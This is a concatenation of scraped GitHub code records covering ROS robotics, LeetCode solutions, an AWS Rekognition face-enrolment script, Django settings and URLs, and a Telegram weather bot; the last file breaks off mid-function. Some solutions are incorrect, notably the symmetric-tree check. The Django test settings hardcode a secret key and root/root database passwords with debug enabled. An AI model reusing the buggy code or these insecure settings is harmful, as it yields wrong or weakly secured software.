marker.pose.orientation.w = 1\n\n marker.scale.x = self.size[0]\n marker.scale.y = self.size[1]\n marker.scale.z = self.size[2]\n marker.color.a = 0.9\n marker.color.r = self.color['r']\n marker.color.g = self.color['g']\n marker.color.b = self.color['b']\n\n if self.marker_type == visualization_msgs.msg.Marker.MESH_RESOURCE:\n marker.mesh_resource = self.mesh_resource\n assert marker.mesh_resource is not None\n\n return marker\n\n def set_color(self, r=1.0, g=1.0, b=1.0):\n self.color['r'] = r\n self.color['g'] = g\n self.color['b'] = b\n\n def reparent(self, new_parent_transform, new_parent):\n del self.parent_object.children[self.name]\n old_parent = self.parent_object\n self.parent_object = new_parent\n self.parent_object.add_child(self)\n self.parent_object_name = new_parent.name\n self.transform_from_parent_object = new_parent_transform\n\n rospy.loginfo(\"Object \" + self.name + \" reparented from \" + old_parent.name + \" to \" + self.parent_object.name)\n\n # def get_grasp_poses(self, end_effector):\n\n\n\n","repo_name":"boschresearch/STAAMS-Solver","sub_path":"roadmap_tools/src/roadmap_tools/scene_object.py","file_name":"scene_object.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"26215211391","text":"# https://leetcode.com/problems/all-nodes-distance-k-in-binary-tree/\n# think \n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:\n mp = {}\n\n def traverse(root, path):\n nonlocal mp\n\n if root is None:\n return\n mp[root] = path\n if not root.left is None:\n traverse(root.left, path + '0')\n if not root.right is None:\n traverse(root.right, path + '1')\n\n def diff(p1, p2):\n n1 = len(p1)\n n2 = len(p2)\n i = 0\n while i < n1 and i < n2:\n if p1[i] != p2[i]:\n break\n i += 1\n return n1 - i + n2 - i\n\n traverse(root, '')\n\n pt = mp[target]\n res = []\n for ptr in mp:\n if diff(pt, mp[ptr]) == K:\n res.append(ptr.val)\n return 
res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0863_all-nodes-distance-k-in-binary-tree_1_AC.py","file_name":"0863_all-nodes-distance-k-in-binary-tree_1_AC.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"16285320998","text":"import io\nimport os\nimport time\n\nimport boto3\nimport cv2\nfrom dotenv import load_dotenv\nfrom PIL import Image\n\nload_dotenv()\n\nrekognition = boto3.client(\n \"rekognition\",\n aws_access_key_id=os.getenv(\"AWS_ACCESS_KEY_ID\"),\n aws_secret_access_key=os.getenv(\"AWS_SECRET_ACCESS_KEY\"),\n region_name=os.getenv(\"REGION_NAME\"),\n)\n\nlistCollectionsResponse = rekognition.list_collections()\n\nprint(f\"CollentionId={listCollectionsResponse['CollectionIds']}\")\nprint(f\"FaceModelVersions={listCollectionsResponse['FaceModelVersions']}\")\n\ncollectionId = \"person-detection\"\n\nif collectionId in listCollectionsResponse[\"CollectionIds\"]:\n response = rekognition.delete_collection(CollectionId=collectionId)\n\nresponse = rekognition.create_collection(CollectionId=collectionId)\n\n\ndef get_face(cap):\n _, frame = cap.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n png = io.BytesIO()\n image.save(png, format=\"png\")\n return png\n\n\nprint(\"\")\nprint(f\"Regist your face.\")\nprint(f\"Indexing your face ...\")\n\ncap = cv2.VideoCapture(0)\ntime.sleep(3)\n\nresponse = rekognition.index_faces(\n CollectionId=collectionId,\n Image={\"Bytes\": get_face(cap).getvalue()},\n DetectionAttributes=[\"DEFAULT\"], #'DEFAULT'|'ALL',\n ExternalImageId=\"test\",\n MaxFaces=1,\n QualityFilter=\"AUTO\", # NONE | AUTO | LOW | MEDIUM | HIGH\n)\n\nprint(response)\nprint(f\"Indexed {response['FaceRecords'][0]['Face']['FaceId']} .\")\n\nprint(\"\")\nprint(\"Test.\")\n\nresponse = rekognition.search_faces_by_image(\n CollectionId=collectionId,\n Image={\"Bytes\": get_face(cap).getvalue()},\n MaxFaces=1,\n FaceMatchThreshold=95,\n)\n\nprint(f\"SearchFacesByImageResponse={response}\")\n","repo_name":"fujitake/smart-building-quick-start-kit","sub_path":"devices/cameras/registrant-detection/face_register.py","file_name":"face_register.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30256516751","text":"# https://leetcode.com/problems/symmetric-tree/\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\ndef isSymmetric(root):\n if root is None:\n return True\n child01 = isSymmetric(root.left)\n child02 = isSymmetric(root.right)\n\n if child01 == child02:\n return True\n\n return False\n\n\nif __name__ == '__main__':\n tree = TreeNode(1)\n tree.left = TreeNode(2)\n tree.right = TreeNode(2)\n tree.left.left = None\n tree.right.left = None\n tree.left.right = 3\n tree.right.right = 3\n\n print(isSymmetric(tree))\n","repo_name":"zubayr-ahmad/solutions","sub_path":"Symmetric_Tree.py","file_name":"Symmetric_Tree.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25283220451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for tests project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, 
see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'rebtxok1^7rs-8t7b8idshbe5wc#=nv)%nm-n+1b0c!mdxlrb_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = DEBUG\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'doj',\n 'doj.tests.db',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'doj.tests.urls'\n\nWSGI_APPLICATION = 'doj.tests.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\nTEST_DATABASES = {\n 'sqlite': {\n 'ENGINE': 'doj.db.backends.sqlite',\n 'NAME': os.path.join(BASE_DIR, 'doj.sqlite3'),\n 'TEST': {\n 'NAME': os.path.join(BASE_DIR, 'doj-tests.sqlite3'),\n }\n },\n 'postgresql': {\n 'ENGINE': 'doj.db.backends.postgresql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n 'mysql': {\n 'ENGINE': 'doj.db.backends.mysql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n 'mssql': {\n 'ENGINE': 'doj.db.backends.mssql',\n 'NAME': 'doj',\n 'HOST': 'localhost',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'TEST': {\n 'NAME': 'doj-tests',\n }\n },\n}\n\nDATABASES = {\n 'default': TEST_DATABASES['sqlite'],\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/dev/topics/i18n/\n\nLANGUAGE_CODE = 'en-gb'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\nSTATIC_URL = '/static/'\n","repo_name":"beachmachine/django-jython","sub_path":"doj/tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"3246681174","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import *\n\nimport views\nimport api_views\nimport datasource_api_views\n\nimport viper_api_views\nimport viper_views\nimport jqm_views\nimport jqm_api_views\n\nurlpatterns = patterns('',\n\t#workspace\n\t#(r'^$', views.show_workspaces),\n\t#(r'^workspace/create/$', views.create_workspace),\n\t#(r'^workspace/delete/(\\d+)/$', views.delete_workspace),\n\t#project\n\t(r'^projects/$', views.show_projects),\n\t(r'^project/edit/(\\d+)/$', views.show_workbench),\n\t(r'^project/copy/(\\d+)/$', views.copy_project),\n\t(r'^project/export/$', views.export_project),\n\t(r'^project/import/$', views.import_project),\n\t(r'^project/create/$', 
views.create_project),\n\t(r'^project/delete/(\\d+)/$', views.delete_project),\n\t#(r'^jqm/(\\d+)/$', views.show_mobile_page),\n\t(r'^preview/(\\d+)/(\\d+)/$', views.preview_page),\n\t(r'^preview/(\\d+)/$', views.preview_page, {'page_id': None}),\n\n\t(r'^jqm_design_page/get/$', jqm_views.show_design_page),\n\t(r'^jqm/preview/$', jqm_views.show_preview_page),\n\t(r'^jqm/view_production/$', jqm_views.show_production_page),\n\t(r'^api/jqm_design_page/create/$', jqm_api_views.create_page),\n\n\t#viper design\n\t(r'^viper_design_page/get/$', viper_views.show_viper_design_page),\n\t(r'^viper_production_page/get/$', viper_views.show_viper_production_page),\n\t#(r'^viper_page/get/$', views.show_viper_page),\n\t#(r'^viper_list_page/get/$', views.show_viper_list_page),\n\t(r'^viper/preview/$', viper_views.show_viper_production_page),\n\t(r'^viper/page/$', viper_views.show_free_page),\n\t# (r'^viper/records/$', viper_views.list_records),\n\t(r'^viper/record/create/$', viper_views.create_record),\n\t(r'^viper/record/update/$', viper_views.update_record),\n\t(r'^viper/record/delete/$', viper_views.delete_record),\n\t(r'^viper/api/record_display_index/update/$', viper_api_views.update_record_display_index),\n\t(r'^viper/api/records/get/$', viper_api_views.get_records),\n\t(r'^api/viper_design_page/create/$', viper_api_views.create_page),\n\t(r'^api/viper_design_page_by_id/create/$', viper_api_views.create_page_by_id),\n\n\n\t#workspace api\n\t(r'^api/workspace_name/update/$', api_views.update_workspace_name),\n\t#page template api\n\t(r'^api/page_template/create/$', api_views.create_page_template),\n\t(r'^api/page_templates/get/$', api_views.get_page_templates),\n\t#datasource api\n\t(r'^api/datasource_project_pages/get/$', datasource_api_views.get_datasource_project_pages),\n\t#project api\n\t(r'^api/project_name/update/$', api_views.update_project_name),\n\t(r'^api/images/get/$', api_views.get_project_images),\n\t(r'^api/image/delete/$', api_views.delete_project_image),\n\t(r'^api/nav_icons/get/$', api_views.get_project_nav_icons),\n\t#page api\n\t(r'^api/page/synchronize/$', api_views.synchronize_page),\n\t(r'^api/page/delete/$', api_views.delete_page),\n\t(r'^api/page_index/update/$', api_views.update_page_display_index),\n\t#(r'^api/pages/create/$', api_views.create_pages),\n\t#(r'^api/mobile_page/create/$', api_views.create_mobile_page),\n\t#(r'^api/viper_result/preview/$', api_views.preview_viper_result),\n\t(r'^api/pages_json/get/$', api_views.get_pages_json),\n\t#css api\n\t(r'^api/css/get/$', api_views.get_css),\n\t(r'^api/css/update/$', api_views.update_css),\n\t(r'^api/apis_content/get/$', api_views.get_apis_content),\n\t(r'^api/apis_content/update/$', api_views.update_apis_content),\n\t#records api\n\t#project data api's api\n\t#(r'^api/project_datasource_api/call/$', api_views.call_project_datasource_api),\n)","repo_name":"chengdg/weizoom","sub_path":"weapp/termite/workbench/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29109804537","text":"import aioredis\r\n\r\nfrom aiogram import Bot, Dispatcher\r\nfrom aiogram.types import Message, CallbackQuery\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\r\nfrom aiogram.dispatcher.filters import Text\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom typing import Any, Coroutine, Union\r\n\r\nfrom .variables import (\r\n 
TG_TOKEN,\r\n REDIS_HOST,\r\n WELCOME_MESSAGE\r\n)\r\nfrom .keyboards import start_keyboard, get_weeather_keyboard\r\nfrom .weather_worker import get_current_weather, get_day_weather, get_weather_by_coords\r\n\r\nbot = Bot(token=TG_TOKEN)\r\ndp = Dispatcher(bot, storage=MemoryStorage())\r\nstorage = MemoryStorage()\r\n\r\nredis = aioredis.from_url(REDIS_HOST)\r\n\r\n\r\nclass Form(StatesGroup):\r\n city = State()\r\n\r\n\r\nasync def start_input(message_object: Union[Message, CallbackQuery]) -> None:\r\n await Form.city.set()\r\n await message_object.reply(\"Введите название города\")\r\n\r\n\r\nasync def send_weather(message_object: Union[Message, CallbackQuery], weather_worker: Coroutine[Any, Any, str]) -> None:\r\n user_city_bytes = await redis.execute_command(\"get\", message_object.from_user.id)\r\n if user_city_bytes is not None:\r\n user_city = user_city_bytes.decode()\r\n weather = await weather_worker(user_city)\r\n await bot.send_message(\r\n message_object.from_user.id,\r\n weather,\r\n )\r\n return\r\n\r\n await start_input(message_object)\r\n\r\n\r\n@dp.message_handler(state='*', commands='cancel')\r\n@dp.message_handler(Text(equals='отмена', ignore_case=True), state='*')\r\nasync def cancel_handler(message: Message, state: FSMContext):\r\n current_state = await state.get_state()\r\n if current_state is None:\r\n return\r\n\r\n await state.finish()\r\n await message.reply('Отмена ввода города')\r\n\r\n\r\n@dp.message_handler(commands=[\"start\"])\r\nasync def send_welcome(message: Message):\r\n await message.answer(\r\n WELCOME_MESSAGE,\r\n reply_markup=start_keyboard\r\n )\r\n\r\n\r\n@dp.callback_query_handler(text=\"get_weather\")\r\n@dp.message_handler(Text(equals=\"🔅 Узнать погоду\", ignore_case=True))\r\nasync def get_weather(callback_query: CallbackQuery):\r\n await send_weather(callback_query, get_current_weather)\r\n\r\n\r\n@dp.message_handler(Text(equals=\"📕 Погода на день\", ignore_case=True))\r\nasync def get_weather(callback_query: CallbackQuery):\r\n await send_weather(callback_query, get_day_weather)\r\n\r\n\r\n@dp.message_handler(commands=[\"change_city\"])\r\n@dp.message_handler(Text(equals=\"🔃 Другой город\", ignore_case=True))\r\nasync def change_city(message: Message):\r\n await start_input(message)\r\n\r\n\r\n@dp.message_handler(state=Form.city)\r\nasync def process_city(message: Message, state: FSMContext):\r\n await redis.execute_command(\"set\", message.from_user.id, message.text)\r\n\r\n await message.reply(\r\n f\"Твой город: {message.text}\",\r\n reply_markup=get_weeather_keyboard\r\n )\r\n\r\n await state.finish()\r\n\r\n\r\n@dp.message_handler(content_types=['location'])\r\nasync def get_location(message: Message):\r\n weather = await get_weather_by_coords(message.location.latitude, message.location.longitude)\r\n await message.reply(\r\n weather,\r\n reply_markup=get_weeather_keyboard\r\n )\r\n","repo_name":"eshumakova/wz_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40039662080","text":"## Importing path, to handle view-url association.\n# Also, importing all blog's views\n\nfrom django.urls import path\nfrom .views import (\n PostListView, \n PostDetailView, \n PostCreateView,\n PostUpdateView,\n PostDeleteView,\n UserPostListView,\n about\n)\n\n\n## All these paths have the root of /blog, as defined on /WebApp/urls.py\n# Observe <int:pk>, for injection filtering\nurlpatterns=[\n path('', 
PostListView.as_view(), name='blog-home'),\n path('user/<str:username>', UserPostListView.as_view(), name='user-posts'),\n path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post/<int:pk>/update', PostUpdateView.as_view(), name='post-update'),\n path('post/<int:pk>/delete', PostDeleteView.as_view(), name='post-delete'),\n path('about', about, name='blog-about'),\n]\n","repo_name":"caiofook/WebApp","sub_path":"WebApp/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73374531752","text":"######################################################################\n# Key point is the median of two \n# SORTED lists DIVIDES the total \n# of two lists into two equal length parts\n# one part always is less than the other part\n# https://leetcode.com/problems/median-of-two-sorted-arrays/solution/\n######################################################################\n\ndef median_of_two_sorted_arrs(A,B):\n m,n = len(A),len(B)\n # always fix on a larger arr size, n > m\n if m > n:\n A,B,m,n = B,A,n,m\n \n # edge case:\n if n == 0:\n raise ValueError\n \n # define range of index i, \n # i traverses m, the smaller length\n imin,imax,half_len = 0,m,(m+n+1)/2\n \n # start a binary search in the range [imin,imax]\n # we are trying to search the proper index i\n # that will divides the lists \n # in this binary search, the return condition \n # is the median condition,\n # when we need to search for a larger or smaller i,\n # we adjust the range, much like binary search\n while imin <= imax:\n i = int((imin+imax)/2)\n j = int(half_len - i )\n \n # by setting j = halflen - i, we make \n # sure left and right parts are the same length\n \n # case 1, B[j-1]<=A[i] && A[i-1]<=B[j]\n # since A, B are already sorted (i.e A[i-1]<=A[i]\n # and B[j-1]<=B[j]), this meresult\n # we've found the median\n if B[j-1] <= A[i] and A[i-1]<= B[j]:\n if i == 0:\n max_of_left = B[j-1]\n elif j == 0:\n max_of_left = A[i-1]\n else:\n max_of_left = max(A[i-1],B[j-1])\n \n if i == m: \n min_of_right = B[j]\n elif j == n:\n min_of_right = A[i]\n else:\n min_of_right = min(A[i],B[j])\n \n if (m+n)%2 == 1:\n return max_of_left\n else:\n return (max_of_left+min_of_right)/2\n elif B[j-1] > A[i]:\n # i and j go in reverse direction\n # we want A to be larger, and B to be\n # smaller\n # to do this, we can only increment i\n # which decrements j\n imin = i+1\n \n elif A[i-1] > B[j]:\n imax = i - 1\n##########################################################\n# since the problem is super open ended\n# there are wayyyyy to many edge cases\n# first attempt would be to use a finite\n# state machine to solve this\n# https://leetcode.com/problems/valid-number/discuss/23728\\\n#/A-simple-solution-in-Python-based-on-DFA\n###########################################################\ndef valid_number(s):\n # define states\n # list of states\n # index stands for state\n # state[0] is state q0\n \n state = [{},\\\n {'blank':1,'sign':2,'digit':3,'dot':4},\\\n {'digit':3,'dot':4},\\\n {'digit':3,'e':6,'dot':5,'blank':9},\\\n {'digit':5},\\\n {'digit':5, 'e':6, 'blank':9},\\\n {'sign':7, 'digit':8},\\\n {'digit':8},\\\n {'digit':8, 'blank':9},\\\n {'blank':9}]\n curS = 1 \n for c in s: \n if c >= '0' and c <='9':\n c = 'digit'\n if c == ' ':\n c = 'blank'\n if c in ['+','-']:\n c = 'sign'\n if c not in state[curS].keys():\n return 
False\n nxtS = state[curS][c]\n curS = nxtS\n if curS not in [3,5,8,9]:\n return False\n return True\n\n\n# the idea is to loop through\n# every pt, and construct a line \n# with every other pt'. Record\n# the slopes as a dictionary, with \n# slope as key. Note, this dictionary is \n# only for this particular pt. Meaning,\n# how many other points share the same slope\n# as well as being through pt.\ndef max_pts_on_a_line(points):\n # need to define helper funcs \n # to avoid floating pt precision problem\n \n # use greatest common divisor and fraction\n # to express floating point in terms of \n # rationals (i.e integer division)\n # gcd here assures 4/8 actually is 1/2, \n # this will make sure the dictionary of \n # slopes don't duplicate/explode unnecessarily\n def gcd(a,b):\n if b == 0:\n return a\n return gcd(b,a%b)\n def frac(x,y):\n g = gcd(x,y)\n return (x//g, y//g)\n \n l = len(points)\n m = 0 \n for i in range(l):\n ptdict = {'inf':1} # infinite slope \n same = 0 \n ix = points[i].x\n iy = points[i].y\n # other points\n for j in range(i+1,l):\n jx = points[j].x\n jy = points[j].y\n if ix == jx and iy == jy:\n same += 1\n continue\n if ix == jx: # on the same verticle line, infinite slope\n slope = 'inf'\n else:\n slope = frac(jy-iy,jx-ix)\n \n if slope not in ptdict.keys():\n ptdict[slope] = 1 \n ptdict[slope]+= 1\n \n print(ptdict)\n m = max(m,max(ptdict.values())+same)\n return m\n\n# word Ladder II\n# for this one, we basically build the BFS tree\n# level by level with words in the wordList\n# and with a smart list comprehension trick, we \n# will get the final resultwer\ndef word_ladder_ii(beginWord,endWord,wordList):\n import collections\n import string\n # use collections defaultdict allows us to keep track of \n # tree structure, at the same time add path\n # info to nodes of interest\n if beginWord not in wordList:\n wordList+=beginWord\n if endWord not in wordList:\n wordList+=endWord\n\n thislevel = {beginWord}\n parents = collections.defaultdict(set)\n\n while thislevel and endWord not in parents:\n nextlevel = collections.defaultdict(set)\n for node in thislevel:\n for char in string.ascii_lowercase:\n for i in range(len(beginWord)):\n n = node[:i]+char+node[i+1:]\n if n in wordList and n not in parents:\n nextlevel[n].add(node) # adding node while exploring \n # tree allows us to build the \n # path back up\n thislevel = nextlevel\n parents.update(nextlevel)\n result = [[endWord]]\n while result and result[0][0] != beginWord:\n result = [[p]+r for r in result for p in parents[result[0][0]]]\n return result\n\n\"\"\"\nwe can rephrase this as a problem about\nthe prefix sums of A. 
\nLet P[i] = A[0] + A[1] + ... + A[i-1] (the prefix sum), for i = 0...N\nWe want the smallest j - i such that\nj > i and \nP[j] - P[i] >= K\n\"\"\"\n \ndef shortest_subarray(A,k):\n import collections\n N = len(A)\n B = [0] * (N+1)\n \n # assemble cumulative sum arr B; O(N)\n for i in range(N): B[i+1] = B[i] + A[i]\n \n # initialize deque d, to keep track\n # of candidate left endpoints: indices whose B values are increasing\n d = collections.deque()\n res = N + 1 \n \n # loop through every ending position of B\n # i.e loop through every j \n for i in range(N+1):\n # continuously find shorter (popleft)\n # and shorter subarrs , i.e, \n # index i, \n # that satisfies the \n # K condition\n while d and B[i] - B[d[0]] >= k:\n subarr_len = i - d.popleft()\n res = min(res, subarr_len)\n \n # while loop to make sure \n # the d-deque actually contains\n # indices that are increasing\n # B's value\n while d and B[i] - B[d[-1]] <= 0:\n d.pop()\n d.append(i)\n return res if res <= N else -1 \n\n##############################\n## text justification\n##############################\ndef text_justification(words,maxWidth):\n res,cur,num_of_letters = [],[],0\n\n for w in words:\n # there is a need for rearrangement\n if num_of_letters + len(w) + len(cur) > maxWidth:\n for i in range(maxWidth - num_of_letters):\n cur[i%(len(cur) -1 or 1)]+= ' '\n res.append(''.join(cur))\n cur,num_of_letters = [],0\n cur +=[w]\n num_of_letters += len(w)\n return res+ [' '.join(cur).ljust(maxWidth)]\n\n# don't use brute force O(N^2)\n# use merge sort\nclass reversePairsSolution(object):\n def __init__(self):\n self.cnt = 0 \n def reversePairs(self,nums):\n def msort(lst):\n # merge sort body \n L = len(lst)\n if L <= 1:\n return lst \n else:\n return merge(msort(lst[:int(L/2)]),msort(lst[int(L/2):]))\n # in this method, we are NOT really\n # sorting things, but rather\n # in the if and else block\n # we are summing how many times left is \n # more than 2 times larger than right, i.e a valid SWAP\n # but in the end, the merge function still has to return \n # the proper sorted list though\n def merge(left,right):\n l,r = 0,0\n while l <(len(left)) and r < len(right):\n if left[l] <= 2 * right[r]:\n l += 1\n else:\n self.cnt +=1\n r += 1\n return sorted(left+right)\n \n msort(nums)\n return self.cnt\n\ndef wildcard_matching(s,p):\n \n # main DP recursion\n # i indicates s\n # j indicates p\n # T[i][j] = (T[i-1][j] or T[i][j-1]) if p[j-1] == '*'\n # = T[i-1][j-1] if (p[j-1] == '?' or p[j-1] == s[i-1])\n # = False\n # where T[i][j] is the subproblem of \n # True or False, s[:i] and p[:j] form a valid\n # wildcard matching\n T = [[None for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n T[0][0] = True\n # base case for T[0]\n for i in range(1,len(p)+1):\n if p[i-1] == '*':\n T[0][i] = T[0][i-1]\n else:\n T[0][i] = False\n # base case for T[:][0]\n for i in range(1,len(s)+1):\n T[i][0] = False\n \n # main recursion\n for i in range(1,len(s)+1):\n for j in range(1,len(p)+1):\n if p[j-1] == '?' 
or p[j-1] == s[i-1]:\n T[i][j] = T[i-1][j-1]\n elif p[j-1] == '*':\n T[i][j] = (T[i-1][j]) or (T[i][j-1])\n else:\n T[i][j] = False\n \n \n return T[len(s)][len(p)]\n\n# Key observation:\n# avg of two lists is also the avg of A\n# (after subtracting the mean from every element, we just need a\n# proper subset that sums to 0)\ndef split_arr_with_same_avg(A):\n from fractions import Fraction\n N = len(A)\n S = sum(A)\n A = [z - Fraction(S,N) for z in A]\n if N == 1:return False\n \n left = {A[0]} # all powersets of first half of A\n # if left sums to zero then True\n # if any powerset of left plus a \n # powerset of right is zero, then True \n right = {A[-1]}\n for i in range(1,int(N/2)):\n left = {z + A[i] for z in left}|left|{A[i]} # adding powersets\n # always keep a set to be sum of all current left elements\n # then or it with current left\n # and or it with new A[i] element\n print(left)\n if 0 in left: return True\n for i in range(int(N/2),N-1):\n right = {z + A[i] for z in right} | right | {A[i]}\n \n if 0 in right: return True\n \n sleft = sum(A[i] for i in range(int(N/2)))\n sright = sum(A[i] for i in range(int(N/2),N))\n \n return any(-ha in right and (ha, -ha) != (sleft, sright) for ha in left)\n\n# The key to this problem is to \n# always choose the smallest next cell to go, among\n# all possible adjacent cells\n# we make sure to use 'seen' set \n# so that we will always keep the heap\n# as the container for candidate cells\ndef swim_in_water(grid):\n import heapq\n # initialize size, heap, set of visited nodes, res\n N, pq, seen, res = len(grid),[(grid[0][0],0,0)],set([(0,0)]),0\n while True:\n T,x,y = heapq.heappop(pq)\n res = max(res,T)\n if x == y == N-1:\n return res\n for i,j in [(x+1,y),(x,y+1),(x-1,y),(x,y-1)]:\n if (i,j) not in seen:\n if 0 <= i < N and 0<=j < N:\n heapq.heappush(pq,(grid[i][j],i,j))\n seen.add((i,j))\n\n# This question was briefly mentioned in \n# cracking the coding interview book \n# early pages\n# two heaps split the numbers into a smaller half\n# and a larger half\n# therefore the median would be either one or avg\n# the min-heap keeps the larger half of numbers\n# the max-heap (implemented as - of minheap) keeps the \n# smaller half of the numbers\n# then, intuitively, the root of max-heap, is the max of \n# small numbers\n# root of the min-heap, is the min\n# of large numbers\n# as long as two heaps are close to the same size\n# we can get median all we want\nimport heapq # module-level import so the methods below can see it\n\nclass MedianFinder(object):\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.small = [] # max-heap (negated values) holding the smaller half\n self.large = [] # min-heap holding the larger half \n\n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: void\n \"\"\"\n # adding new number to two heaps\n # making sure we are balancing among the small and\n # large heaps\n heapq.heappush(self.small,-heapq.heappushpop(self.large,num))\n \n # balance two lengths\n if len(self.large) < len(self.small):\n heapq.heappush(self.large,-heapq.heappop(self.small))\n \n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n # median should be in the larger lump \n if len(self.large) > len(self.small):\n return float(self.large[0])\n return (self.large[0] - self.small[0])/2.0\n \n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n\ndef min_refuel_stops(target,startFuel,stations):\n import heapq\n past_stations = [] # this will be a max_heap\n stations.append((target,float('inf')))\n \n incremental_miles = 0\n res = 0 \n fuelLeft = startFuel\n \n for locale,fuelamount in stations:\n # 
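(greedy: drive as far as the tank allows and, whenever fuel goes\n # negative, retroactively refuel at the largest station passed so far)\n # 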
at every new station\n # first update fuel left\n fuelLeft -= locale - incremental_miles\n\n # check if we succeeded\n if fuelLeft >=0 and incremental_miles == target:\n return res\n # if we ran out of fuel\n # we can 'regret' and refuel at previous most \n # capacious gas station till we are full\n # note, we are not going back in time\n # we are still at the current location, station. \n # we are just regretting previous mishaps\n while fuelLeft < 0 and past_stations:\n fuelLeft += -heapq.heappop(past_stations)\n res +=1\n # if there is no possible way we can refuel \n # back, we declare failure\n if fuelLeft < 0:return -1\n \n # in the end, if everything above executes fine\n # and we are still in the game\n # let's add this station to the heap,\n # for now, we are not refueling at this station,\n # but who knows, we may regret later and pop it off\n # the heap\n heapq.heappush(past_stations,-fuelamount)\n \n # update our incremental miles\n incremental_miles = locale\n return res\n\n# Algo:\n# Compare the heads of every list, pick the smallest one to \n# the new list. \n# Do this with priority queue (implemented with heap underneath)\n# overall runtime would be O(NlogK)\ndef merge_k_sorted_linkedlists(lists):\n from queue import PriorityQueue\n newhead = ListNode(0)\n current = newhead\n q = PriorityQueue()\n\n # putting the headnodes of each list\n # to the q is the same as putting \n # the whole list there, because we are \n # dealing with LINKED list here. \n for headnode in lists:\n if headnode:q.put((headnode.val,headnode))\n while q.qsize()>0:\n current.next = q.get()[1] # index [1] to get the actual node\n current = current.next # move the new position in the new list\n # while we are at it,\n # we put the current's next node to q\n if current.next:\n q.put((current.next.val,current.next))\n return newhead.next\n\n# Algo:\n# nearest palindrome\ndef nearestPalindromic(S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n def palindsize(x):\n return abs(int(S) - int(x))\n \n L = len(S)\n #Start with basic candidates, \n # ones which start with 10..., because those ones\n # could potentially be the most minimizing ones\n # covering edge cases like 100, which should be 99 instead of 101\n cands = [str(10**l+tiny_delta) for l in (L-1,L) for tiny_delta in (-1,1)] \n prefix = S[:(L+1)//2] \n P = int(prefix)\n \n # now, for the first part, 